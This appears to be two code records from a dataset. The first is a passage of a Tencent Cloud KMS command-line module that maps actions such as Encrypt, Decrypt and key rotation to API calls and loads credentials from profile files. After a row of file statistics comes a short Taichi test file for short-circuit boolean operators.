cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.AsymmetricRsaDecryptRequest()
model.from_json_string(json.dumps(args))
rsp = client.AsymmetricRsaDecrypt(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDisableKeyRotation(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DisableKeyRotationRequest()
model.from_json_string(json.dumps(args))
rsp = client.DisableKeyRotation(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDisableWhiteBoxKey(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DisableWhiteBoxKeyRequest()
model.from_json_string(json.dumps(args))
rsp = client.DisableWhiteBoxKey(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doEnableKeys(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.EnableKeysRequest()
model.from_json_string(json.dumps(args))
rsp = client.EnableKeys(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doScheduleKeyDeletion(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ScheduleKeyDeletionRequest()
model.from_json_string(json.dumps(args))
rsp = client.ScheduleKeyDeletion(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeWhiteBoxDeviceFingerprints(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeWhiteBoxDeviceFingerprintsRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeWhiteBoxDeviceFingerprints(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeKey(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeKeyRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeKey(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doUnbindCloudResource(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.UnbindCloudResourceRequest()
model.from_json_string(json.dumps(args))
rsp = client.UnbindCloudResource(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doEnableKeyRotation(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.EnableKeyRotationRequest()
model.from_json_string(json.dumps(args))
rsp = client.EnableKeyRotation(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateWhiteBoxKey(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateWhiteBoxKeyRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateWhiteBoxKey(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doEnableWhiteBoxKey(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.EnableWhiteBoxKeyRequest()
model.from_json_string(json.dumps(args))
rsp = client.EnableWhiteBoxKey(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doEnableKey(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.EnableKeyRequest()
model.from_json_string(json.dumps(args))
rsp = client.EnableKey(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDecrypt(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DecryptRequest()
model.from_json_string(json.dumps(args))
rsp = client.Decrypt(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeKeys(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeKeysRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeKeys(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeWhiteBoxServiceStatus(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeWhiteBoxServiceStatusRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeWhiteBoxServiceStatus(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doUpdateKeyDescription(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.UpdateKeyDescriptionRequest()
model.from_json_string(json.dumps(args))
rsp = client.UpdateKeyDescription(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCancelKeyArchive(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CancelKeyArchiveRequest()
model.from_json_string(json.dumps(args))
rsp = client.CancelKeyArchive(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeWhiteBoxDecryptKey(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeWhiteBoxDecryptKeyRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeWhiteBoxDecryptKey(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doGetRegions(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.GetRegionsRequest()
model.from_json_string(json.dumps(args))
rsp = client.GetRegions(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doVerifyByAsymmetricKey(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.VerifyByAsymmetricKeyRequest()
model.from_json_string(json.dumps(args))
rsp = client.VerifyByAsymmetricKey(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
CLIENT_MAP = {
"v20190118": kms_client_v20190118,
}
MODELS_MAP = {
"v20190118": models_v20190118,
}
ACTION_MAP = {
"DeleteImportedKeyMaterial": doDeleteImportedKeyMaterial,
"Encrypt": doEncrypt,
"EnableWhiteBoxKeys": doEnableWhiteBoxKeys,
"UpdateAlias": doUpdateAlias,
"DeleteWhiteBoxKey": doDeleteWhiteBoxKey,
"ImportKeyMaterial": doImportKeyMaterial,
"GetPublicKey": doGetPublicKey,
"DisableKey": doDisableKey,
"GenerateDataKey": doGenerateDataKey,
"AsymmetricSm2Decrypt": doAsymmetricSm2Decrypt,
"SignByAsymmetricKey": doSignByAsymmetricKey,
"CancelKeyDeletion": doCancelKeyDeletion,
"GetKeyRotationStatus": doGetKeyRotationStatus,
"DescribeWhiteBoxKeyDetails": doDescribeWhiteBoxKeyDetails,
"BindCloudResource": doBindCloudResource,
"DisableKeys": doDisableKeys,
"ArchiveKey": doArchiveKey,
"GetServiceStatus": doGetServiceStatus,
"EncryptByWhiteBox": doEncryptByWhiteBox,
"ListAlgorithms": doListAlgorithms,
"ReEncrypt": doReEncrypt,
"ListKeys": doListKeys,
"GenerateRandom": doGenerateRandom,
"OverwriteWhiteBoxDeviceFingerprints": doOverwriteWhiteBoxDeviceFingerprints,
"CreateKey": doCreateKey,
"DescribeWhiteBoxKey": doDescribeWhiteBoxKey,
"GetParametersForImport": doGetParametersForImport,
"DisableWhiteBoxKeys": doDisableWhiteBoxKeys,
"ListKeyDetail": doListKeyDetail,
"AsymmetricRsaDecrypt": doAsymmetricRsaDecrypt,
"DisableKeyRotation": doDisableKeyRotation,
"DisableWhiteBoxKey": doDisableWhiteBoxKey,
"EnableKeys": doEnableKeys,
"ScheduleKeyDeletion": doScheduleKeyDeletion,
"DescribeWhiteBoxDeviceFingerprints": doDescribeWhiteBoxDeviceFingerprints,
"DescribeKey": doDescribeKey,
"UnbindCloudResource": doUnbindCloudResource,
"EnableKeyRotation": doEnableKeyRotation,
"CreateWhiteBoxKey": doCreateWhiteBoxKey,
"EnableWhiteBoxKey": doEnableWhiteBoxKey,
"EnableKey": doEnableKey,
"Decrypt": doDecrypt,
"DescribeKeys": doDescribeKeys,
"DescribeWhiteBoxServiceStatus": doDescribeWhiteBoxServiceStatus,
"UpdateKeyDescription": doUpdateKeyDescription,
"CancelKeyArchive": doCancelKeyArchive,
"DescribeWhiteBoxDecryptKey": doDescribeWhiteBoxDecryptKey,
"GetRegions": doGetRegions,
"VerifyByAsymmetricKey": doVerifyByAsymmetricKey,
}
AVAILABLE_VERSION_LIST = [
"v20190118",
]
def action_caller():
return ACTION_MAP
def parse_global_arg(parsed_globals):
g_param = parsed_globals
is_exist_profile = True
if not parsed_globals["profile"]:
is_exist_profile = False
g_param["profile"] = "default"
configure_path = os.path.join(os.path.expanduser("~"), ".tccli")
is_conf_exist, conf_path = Utils.file_existed(configure_path, g_param["profile"] + ".configure")
is_cred_exist, cred_path = Utils.file_existed(configure_path, g_param["profile"] + ".credential")
conf = {}
cred = {}
if is_conf_exist:
conf = Utils.load_json_msg(conf_path)
if is_cred_exist:
cred = Utils.load_json_msg(cred_path)
if not (isinstance(conf, dict) and isinstance(cred, dict)):
raise ConfigurationError(
"file: %s or %s is not json format"
% (g_param["profile"] + ".configure", g_param["profile"] + ".credential"))
if OptionsDefine.Token not in cred:
cred[OptionsDefine.Token] = None
if not is_exist_profile:
if os.environ.get(OptionsDefine.ENV_SECRET_ID) and os.environ.get(OptionsDefine.ENV_SECRET_KEY):
cred[OptionsDefine.SecretId] = os.environ.get(OptionsDefine.ENV_SECRET_ID)
cred[OptionsDefine.SecretKey] = os.environ.get(OptionsDefine.ENV_SECRET_KEY)
cred[OptionsDefine.Token] = os.environ.get(OptionsDefine.ENV_TOKEN)
if os.environ.get(OptionsDefine.ENV_REGION):
conf[OptionsDefine.Region] = os.environ.get(OptionsDefine.ENV_REGION)
for param in g_param.keys():
if g_param[param] is None:
if param in [OptionsDefine.SecretKey, OptionsDefine.SecretId, OptionsDefine.Token]:
if param in cred:
g_param[param] = cred[param]
else:
raise ConfigurationError("%s is invalid" % param)
elif param in [OptionsDefine.Region, OptionsDefine.Output]:
if param in conf:
g_param[param] = conf[param]
else:
raise ConfigurationError("%s is invalid" % param)
try:
if g_param[OptionsDefine.ServiceVersion]:
g_param[OptionsDefine.Version] = "v" + g_param[OptionsDefine.ServiceVersion].replace('-', '')
else:
version = conf["kms"][OptionsDefine.Version]
g_param[OptionsDefine.Version] = "v" + version.replace('-', '')
if g_param[OptionsDefine.Endpoint] is None:
g_param[OptionsDefine.Endpoint] = conf["kms"][OptionsDefine.Endpoint]
except Exception as err:
raise ConfigurationError("config file:%s error, %s" % (conf_path, str(err)))
if g_param[OptionsDefine.Version] not in AVAILABLE_VERSION_LIST:
raise Exception("available versions: %s" % " ".join(AVAILABLE_VERSION_LIST))
return g_param
| 43.350131 | 105 | 0.725766 | 7,534 | 66,239 | 6.141625 | 0.036103 | 0.084934 | 0.244322 | 0.056753 | 0.862527 | 0.858702 | 0.857146 | 0.85559 | 0.853558 | 0.805818 | 0 | 0.008507 | 0.165884 | 66,239 | 1,527 | 106 | 43.37852 | 0.828962 | 0.007714 | 0 | 0.72929 | 0 | 0 | 0.038492 | 0.003319 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037722 | false | 0 | 0.017751 | 0.00074 | 0.056953 | 0.005917 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
40e45998eb95b018fd7214ac59f799db254bc074 | 921 | py | Python | tests/python/test_short_circuit.py | kxxt/taichi | 15f39b79c258080f1e34fcbdc29646d9ced0a4fe | [
"MIT"
] | 11,699 | 2020-01-09T03:02:46.000Z | 2022-03-31T20:59:08.000Z | tests/python/test_short_circuit.py | kxxt/taichi | 15f39b79c258080f1e34fcbdc29646d9ced0a4fe | [
"MIT"
] | 3,589 | 2020-01-09T03:18:25.000Z | 2022-03-31T19:06:42.000Z | tests/python/test_short_circuit.py | kxxt/taichi | 15f39b79c258080f1e34fcbdc29646d9ced0a4fe | [
"MIT"
] | 1,391 | 2020-01-09T03:02:54.000Z | 2022-03-31T08:44:29.000Z | import taichi as ti
@ti.test(debug=True, short_circuit_operators=True)
def test_and_shorted():
a = ti.field(ti.i32, shape=10)
@ti.func
def explode() -> ti.i32:
return a[-1]
@ti.kernel
def func() -> ti.i32:
return False and explode()
assert func() == 0
@ti.test(debug=True, short_circuit_operators=True)
def test_and_not_shorted():
@ti.kernel
def func() -> ti.i32:
return True and False
assert func() == 0
@ti.test(debug=True, short_circuit_operators=True)
def test_or_shorted():
a = ti.field(ti.i32, shape=10)
@ti.func
def explode() -> ti.i32:
return a[-1]
@ti.kernel
def func() -> ti.i32:
return True or explode()
assert func() == 1
@ti.test(debug=True, short_circuit_operators=True)
def test_or_not_shorted():
@ti.kernel
def func() -> ti.i32:
return False or True
assert func() == 1
